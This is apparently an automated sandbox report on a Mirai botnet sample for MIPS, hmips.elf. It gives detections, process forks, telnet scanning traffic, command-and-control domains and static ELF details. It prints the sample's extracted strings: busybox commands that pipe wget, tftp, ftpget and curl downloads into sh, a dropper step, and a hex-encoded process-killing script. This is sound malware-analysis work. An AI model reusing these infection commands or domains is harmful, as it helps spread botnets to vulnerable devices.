Edit tour

Linux Analysis Report
hmips.elf

Overview

General Information

Sample name:	hmips.elf
Analysis ID:	1579200
MD5:	40fa65794e145a61bc34ce27581f9fca
SHA1:	c7d7a8f9f26394dfc4d6be2a05ba5e0d0cfaa91d
SHA256:	d02adfd870363610aa7d7862c1627639f7688b7ffaa51f363dd3588cad104b2d
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Sends malformed DNS queries

Detected TCP or UDP traffic on non-standard ports

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579200
Start date and time:	2024-12-21 04:26:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 56s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	hmips.elf
Detection:	MAL
Classification:	mal72.troj.linELF@0/0@69/0

Warnings

Report size exceeded maximum capacity and may have missing network information.
TCP Packets have been reduced to 100

Runtime Messages

Command:	/tmp/hmips.elf
PID:	6240
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	I just wanna look after my cats, man.
Standard Error:

Process Tree

system is lnxubuntu20

hmips.elf (PID: 6240, Parent: 6165, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/hmips.elf

hmips.elf New Fork (PID: 6242, Parent: 6240)

hmips.elf New Fork (PID: 6298, Parent: 6242)

hmips.elf New Fork (PID: 6308, Parent: 6298)

hmips.elf New Fork (PID: 6315, Parent: 6308)

hmips.elf New Fork (PID: 6244, Parent: 6240)

hmips.elf New Fork (PID: 6268, Parent: 6244)

hmips.elf New Fork (PID: 6270, Parent: 6268)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
hmips.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hmips.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: hmips.elf

ReversingLabs: Detection: 39%

Source: hmips.elf

String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 86.107.100.19 ports 20665,0,2,5,6,9209

Sends malformed DNS queries

Source: global traffic	DNS traffic detected: malformed DNS query: catvision.dyn. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: hikvision.geek. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: catlovingfools.geek. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: shitrocket.dyn. [malformed]

Source: global traffic	TCP traffic: 192.168.2.23:51294 -> 86.107.100.19:20665
Source: global traffic	TCP traffic: 192.168.2.23:40680 -> 185.72.8.231:2383
Source: global traffic	TCP traffic: 192.168.2.23:54152 -> 80.78.26.121:2383
Source: global traffic	TCP traffic: 192.168.2.23:43438 -> 212.60.5.153:5522
Source: global traffic	TCP traffic: 192.168.2.23:48188 -> 176.32.32.113:22126
Source: global traffic	TCP traffic: 192.168.2.23:56450 -> 212.192.13.95:16377

Source: /tmp/hmips.elf (PID: 6240)

Socket: 127.0.0.1:1172

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 120.224.93.115
Source: unknown	TCP traffic detected without corresponding DNS query: 62.166.115.166
Source: unknown	TCP traffic detected without corresponding DNS query: 62.6.168.44
Source: unknown	TCP traffic detected without corresponding DNS query: 142.119.152.81
Source: unknown	TCP traffic detected without corresponding DNS query: 11.42.56.192
Source: unknown	TCP traffic detected without corresponding DNS query: 62.196.90.63
Source: unknown	TCP traffic detected without corresponding DNS query: 119.86.34.158
Source: unknown	TCP traffic detected without corresponding DNS query: 154.129.141.96
Source: unknown	TCP traffic detected without corresponding DNS query: 66.82.186.198
Source: unknown	TCP traffic detected without corresponding DNS query: 111.252.80.55
Source: unknown	TCP traffic detected without corresponding DNS query: 34.173.174.163
Source: unknown	TCP traffic detected without corresponding DNS query: 46.193.69.189
Source: unknown	TCP traffic detected without corresponding DNS query: 164.136.33.219
Source: unknown	TCP traffic detected without corresponding DNS query: 182.57.234.110
Source: unknown	TCP traffic detected without corresponding DNS query: 31.250.118.146
Source: unknown	TCP traffic detected without corresponding DNS query: 45.176.93.125
Source: unknown	TCP traffic detected without corresponding DNS query: 174.130.139.50
Source: unknown	TCP traffic detected without corresponding DNS query: 65.111.149.151
Source: unknown	TCP traffic detected without corresponding DNS query: 15.248.79.16
Source: unknown	TCP traffic detected without corresponding DNS query: 71.77.221.78
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.136.244
Source: unknown	TCP traffic detected without corresponding DNS query: 174.157.249.17
Source: unknown	TCP traffic detected without corresponding DNS query: 217.2.170.5
Source: unknown	TCP traffic detected without corresponding DNS query: 68.231.152.164
Source: unknown	TCP traffic detected without corresponding DNS query: 209.49.174.176
Source: unknown	TCP traffic detected without corresponding DNS query: 120.224.93.115
Source: unknown	TCP traffic detected without corresponding DNS query: 176.166.134.254
Source: unknown	TCP traffic detected without corresponding DNS query: 62.166.115.166
Source: unknown	TCP traffic detected without corresponding DNS query: 104.1.238.242
Source: unknown	TCP traffic detected without corresponding DNS query: 62.6.168.44
Source: unknown	TCP traffic detected without corresponding DNS query: 27.28.57.171
Source: unknown	TCP traffic detected without corresponding DNS query: 142.119.152.81
Source: unknown	TCP traffic detected without corresponding DNS query: 11.42.56.192
Source: unknown	TCP traffic detected without corresponding DNS query: 28.211.63.80
Source: unknown	TCP traffic detected without corresponding DNS query: 145.81.142.101
Source: unknown	TCP traffic detected without corresponding DNS query: 153.9.186.174
Source: unknown	TCP traffic detected without corresponding DNS query: 144.68.49.216
Source: unknown	TCP traffic detected without corresponding DNS query: 40.143.23.203
Source: unknown	TCP traffic detected without corresponding DNS query: 208.90.131.245
Source: unknown	TCP traffic detected without corresponding DNS query: 175.85.215.224
Source: unknown	TCP traffic detected without corresponding DNS query: 61.184.163.149
Source: unknown	TCP traffic detected without corresponding DNS query: 157.87.70.85
Source: unknown	TCP traffic detected without corresponding DNS query: 54.160.157.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.15.229.91
Source: unknown	TCP traffic detected without corresponding DNS query: 75.178.106.170
Source: unknown	TCP traffic detected without corresponding DNS query: 18.96.200.187
Source: unknown	TCP traffic detected without corresponding DNS query: 167.29.60.142
Source: unknown	TCP traffic detected without corresponding DNS query: 40.36.238.144
Source: unknown	TCP traffic detected without corresponding DNS query: 39.107.215.89

Source: global traffic	DNS traffic detected: DNS query: shitrocket.dyn
Source: global traffic	DNS traffic detected: DNS query: hikvision.geek
Source: global traffic	DNS traffic detected: DNS query: catlovingfools.geek
Source: global traffic	DNS traffic detected: DNS query: catvision.dyn. [malformed]
Source: global traffic	DNS traffic detected: DNS query: hikvision.geek. [malformed]
Source: global traffic	DNS traffic detected: DNS query: catlovingfools.geek. [malformed]
Source: global traffic	DNS traffic detected: DNS query: shitrocket.dyn. [malformed]

Source: hmips.elf	String found in binary or memory: http:///curl.sh
Source: hmips.elf	String found in binary or memory: http:///wget.sh

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname Kamru
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample	String containing 'busybox' found: /wget.sh -O- \| sh;/bin/busybox tftp -g
Source: Initial sample	String containing 'busybox' found: -r tftp.sh -l- \| sh;/bin/busybox ftpget
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./Galaxy selfrep
Source: Initial sample	String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- \| shGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./Galaxy selfrepI just wanna look/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mpslppcspcsh4

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal72.troj.linELF@0/0@69/0

Source: /tmp/hmips.elf (PID: 6240)

Queries kernel information via 'uname':

Source: hmips.elf, 6240.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp, hmips.elf, 6242.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/hmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/hmips.elf
Source: hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp	Binary or memory string: ^U!/usr/bin/vmtoolsd
Source: hmips.elf, 6240.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp, hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp	Binary or memory string: ^U!/etc/qemu-binfmt/mips
Source: hmips.elf, 6240.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp, hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: hmips.elf, 6240.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp, hmips.elf, 6242.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: hmips.elf, type: SAMPLE
Source: Yara match	File source: 6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: hmips.elf, type: SAMPLE
Source: Yara match	File source: 6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hmips.elf	39%	ReversingLabs	Linux.Backdoor.Mirai
hmips.elf	100%	Avira	EXP/ELF.Agent.J.8

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
shitrocket.dyn	212.60.5.153	true	false	high
catlovingfools.geek	185.72.8.231	true	false	high
hikvision.geek	185.72.8.231	true	false	high
catlovingfools.geek. [malformed]	unknown	unknown	false	high
hikvision.geek. [malformed]	unknown	unknown	false	high
shitrocket.dyn. [malformed]	unknown	unknown	false	high
catvision.dyn. [malformed]	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http:///wget.sh	hmips.elf	false		high
http:///curl.sh	hmips.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
61.248.201.68	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
158.111.69.119	unknown	United States	13611	CDCUS	false
92.243.22.79	unknown	France	203476	GANDI-AS-2Domainnameregistrar-httpwwwgandinetFR	false
59.101.152.237	unknown	Australia	2764	AAPTAAPTLimitedAU	false
147.175.228.70	unknown	Slovakia (SLOVAK Republic)	2607	SANETSlovakAcademicNetworkSK	false
55.84.215.193	unknown	United States	351	DNIC-ASBLK-00306-00371US	false
185.230.47.158	unknown	Ukraine	205692	WEBINVESTPLUSUA	false
28.13.247.181	unknown	United States	7922	COMCAST-7922US	false
84.194.149.212	unknown	Belgium	6848	TELENET-ASBE	false
101.102.207.29	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
78.91.104.110	unknown	Norway	224	UNINETTUNINETTTheNorwegianUniversityResearchNetwork	false
54.185.230.168	unknown	United States	16509	AMAZON-02US	false
188.138.99.78	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	false
217.238.216.22	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
4.39.172.234	unknown	United States	46164	ATT-MOBILITY-LABSUS	false
77.181.19.192	unknown	Germany	6805	TDDE-ASN1DE	false
191.123.132.141	unknown	Brazil	26615	TIMSABR	false
129.93.247.90	unknown	United States	7896	NU-ASUS	false
199.33.240.31	unknown	United States	7782	ALSK-7782US	false
205.51.55.180	unknown	United States	2914	NTT-COMMUNICATIONS-2914US	false
157.151.4.253	unknown	United States	23342	UNITEDLAYERUS	false
196.170.87.186	unknown	Togo	24691	TOGOTEL-ASTogoTelecomTogoTG	false
206.209.124.186	unknown	United States	23548	THEDACAREUS	false
211.17.244.132	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
132.66.186.162	unknown	Israel	378	MACHBA-ASILANIL	false
166.87.167.210	unknown	Saudi Arabia	5080	ARAMCO-ASUS	false
75.128.235.161	unknown	United States	20115	CHARTER-20115US	false
145.224.25.238	unknown	United Kingdom	1101	IP-EEND-ASIP-EENDBVNL	false
30.236.150.145	unknown	United States	7922	COMCAST-7922US	false
121.237.234.92	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
22.238.114.140	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
63.41.135.162	unknown	United States	22394	CELLCOUS	false
203.241.214.22	unknown	Korea Republic of	18401	AS18401-AS-KRDAEGUUNIVERSITYKR	false
220.20.108.56	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
109.142.223.115	unknown	Belgium	5432	PROXIMUS-ISP-ASBE	false
211.160.25.151	unknown	China	9814	FIBRLINKBeijingFibrLINKNetworksCoLtdCN	false
60.105.182.252	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
183.19.27.115	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
209.248.243.232	unknown	United States	7029	WINDSTREAMUS	false
90.221.106.17	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
223.98.57.231	unknown	China	24444	CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompany	false
66.9.20.10	unknown	United States	18885	M2NGAGE2US	false
170.101.226.66	unknown	Saudi Arabia	25019	SAUDINETSTC-ASSA	false
175.23.41.204	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
131.110.72.47	unknown	United States	6	BULL-HNUS	false
143.225.102.51	unknown	Italy	137	ASGARRConsortiumGARREU	false
156.60.232.255	unknown	United States	1226	CTA-42-AS1226US	false
206.64.5.124	unknown	United States	701	UUNETUS	false
64.79.82.146	unknown	United States	10297	ENET-2US	false
146.211.79.112	unknown	Finland	16086	DNAFI	false
24.66.153.15	unknown	Canada	6327	SHAWCA	false
58.12.166.205	unknown	Japan	17506	UCOMARTERIANetworksCorporationJP	false
54.54.164.172	unknown	United States	14618	AMAZON-AESUS	false
49.30.181.29	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
167.12.63.91	unknown	United States	3816	COLOMBIATELECOMUNICACIONESSAESPCO	false
137.27.163.26	unknown	United States	20115	CHARTER-20115US	false
146.20.121.237	unknown	United States	27357	RACKSPACEUS	false
38.207.37.102	unknown	United States	9009	M247GB	false
74.100.71.79	unknown	United States	701	UUNETUS	false
73.105.156.45	unknown	United States	7922	COMCAST-7922US	false
36.50.14.16	unknown	unknown	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
37.206.42.120	unknown	Italy	3269	ASN-IBSNAZIT	false
115.244.44.165	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
156.214.15.151	unknown	Egypt	8452	TE-ASTE-ASEG	false
175.108.110.197	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
101.219.236.184	unknown	India	58519	CHINATELECOM-CTCLOUDCloudComputingCorporationCN	false
78.170.19.203	unknown	Turkey	9121	TTNETTR	false
108.78.15.60	unknown	United States	7018	ATT-INTERNET4US	false
209.92.151.127	unknown	United States	7029	WINDSTREAMUS	false
161.177.38.22	unknown	United States	10695	WAL-MARTUS	false
6.117.134.75	unknown	United States	3356	LEVEL3US	false
78.61.93.100	unknown	Lithuania	8764	TELIA-LIETUVALT	false
146.225.111.145	unknown	United States	25400	TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO	false
30.210.187.13	unknown	United States	7922	COMCAST-7922US	false
153.203.223.211	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
150.179.157.247	unknown	United States	3479	PEACHNET-AS1US	false
99.218.40.105	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	false
40.99.98.3	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
201.3.136.151	unknown	Brazil	8167	BrasilTelecomSA-FilialDistritoFederalBR	false
58.65.191.39	unknown	Pakistan	23674	NAYATEL-PKNayatelPvtLtdPK	false
61.26.182.226	unknown	Japan	9824	JTCL-JP-ASJupiterTelecommunicationCoLtdJP	false
201.143.209.15	unknown	Mexico	8151	UninetSAdeCVMX	false
124.65.32.115	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
142.17.208.176	unknown	Canada	611	NECN-1-611CA	false
213.85.209.25	unknown	Russian Federation	8615	CNT-ASMoscowRussiaRU	false
166.180.68.254	unknown	United States	22394	CELLCOUS	false
37.248.66.142	unknown	Poland	8374	PLUSNETPlusnetworkoperatorinPolandPL	false
94.244.131.127	unknown	Ukraine	34743	NASHNET-ASKievUkraineUA	false
5.36.68.138	unknown	Oman	28885	OMANTEL-NAP-ASOmanTelNAPOM	false
136.48.74.228	unknown	United States	16591	GOOGLE-FIBERUS	false
204.16.157.87	unknown	United States	30686	LVLT-30686US	false
86.55.160.189	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
183.9.56.218	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
121.231.38.194	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
132.193.131.201	unknown	United States	668	DNIC-AS-00668US	false
31.59.195.66	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	false
26.227.137.255	unknown	United States	7922	COMCAST-7922US	false
135.33.140.90	unknown	United States	54614	CIKTELECOM-CABLECA	false
135.174.27.80	unknown	United States	14962	NCR-252US	false
142.176.248.215	unknown	Canada	855	CANET-ASN-4CA	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.546117135531765
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	hmips.elf
File size:	89'408 bytes
MD5:	40fa65794e145a61bc34ce27581f9fca
SHA1:	c7d7a8f9f26394dfc4d6be2a05ba5e0d0cfaa91d
SHA256:	d02adfd870363610aa7d7862c1627639f7688b7ffaa51f363dd3588cad104b2d
SHA512:	c4d234cb037089769b82aaa424be73f1d31ff403197d5ecc705de3f88f8d17bb1ffee5e0597c6ff5d63d3db0b5cb4febfb3412baac1940197fbbe0efab62ed02
SSDEEP:	1536:PjRdrJyhVuqVuIWu30rJfLueVqCHyOUeE3k1XPSni8VRw/TPm:1dFyWfLcCSO1XPSnid/TO
TLSH:	E793D71E6E71AFADF778C33447774A30A7A863C126E18686D2BCE5101E2034D685FBE4
File Content Preview:	.ELF.....................@.`...4..[......4. ...(.............@...@....M...M...............P..EP..EP.......\H........dt.Q............................<...'......!'.......................<...'......!... ....'9... ......................<...'......!........'9+

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	88848
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x12b30	0x0	0x6	AX	16
.fini	PROGBITS	0x412c50	0x12c50	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x412cb0	0x12cb0	0x2100	0x0	0x2	A	16
.ctors	PROGBITS	0x455000	0x15000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x455008	0x15008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x455014	0x15014	0xdc	0x0	0x3	WA	4
.data	PROGBITS	0x4550f0	0x150f0	0x3c8	0x0	0x3	WA	16
.got	PROGBITS	0x4554c0	0x154c0	0x5ec	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x455aac	0x15aac	0x28	0x0	0x10000003	WAp	4
.bss	NOBITS	0x455ae0	0x15aac	0x5168	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0xc4e	0x15aac	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x15aac	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x14db0	0x14db0	5.6089	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x15000	0x455000	0x455000	0xaac	0x5c48	3.7245	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 04:26:54.261223078 CET	43928	443	192.168.2.23	91.189.91.42
Dec 21, 2024 04:26:55.429908037 CET	38810	23	192.168.2.23	120.224.93.115
Dec 21, 2024 04:26:55.430830002 CET	40616	23	192.168.2.23	62.166.115.166
Dec 21, 2024 04:26:55.431493998 CET	42290	23	192.168.2.23	62.6.168.44
Dec 21, 2024 04:26:55.432117939 CET	50404	23	192.168.2.23	142.119.152.81
Dec 21, 2024 04:26:55.432729959 CET	35072	23	192.168.2.23	11.42.56.192
Dec 21, 2024 04:26:55.457331896 CET	42428	23	192.168.2.23	62.196.90.63
Dec 21, 2024 04:26:55.505192995 CET	35096	23	192.168.2.23	119.86.34.158
Dec 21, 2024 04:26:55.506745100 CET	34242	23	192.168.2.23	154.129.141.96
Dec 21, 2024 04:26:55.508044004 CET	47278	23	192.168.2.23	66.82.186.198
Dec 21, 2024 04:26:55.508879900 CET	52734	23	192.168.2.23	111.252.80.55
Dec 21, 2024 04:26:55.509354115 CET	55136	23	192.168.2.23	34.173.174.163
Dec 21, 2024 04:26:55.509826899 CET	35446	23	192.168.2.23	46.193.69.189
Dec 21, 2024 04:26:55.510265112 CET	44078	23	192.168.2.23	164.136.33.219
Dec 21, 2024 04:26:55.525739908 CET	58852	23	192.168.2.23	182.57.234.110
Dec 21, 2024 04:26:55.527673960 CET	57378	23	192.168.2.23	31.250.118.146
Dec 21, 2024 04:26:55.528419971 CET	34590	23	192.168.2.23	45.176.93.125
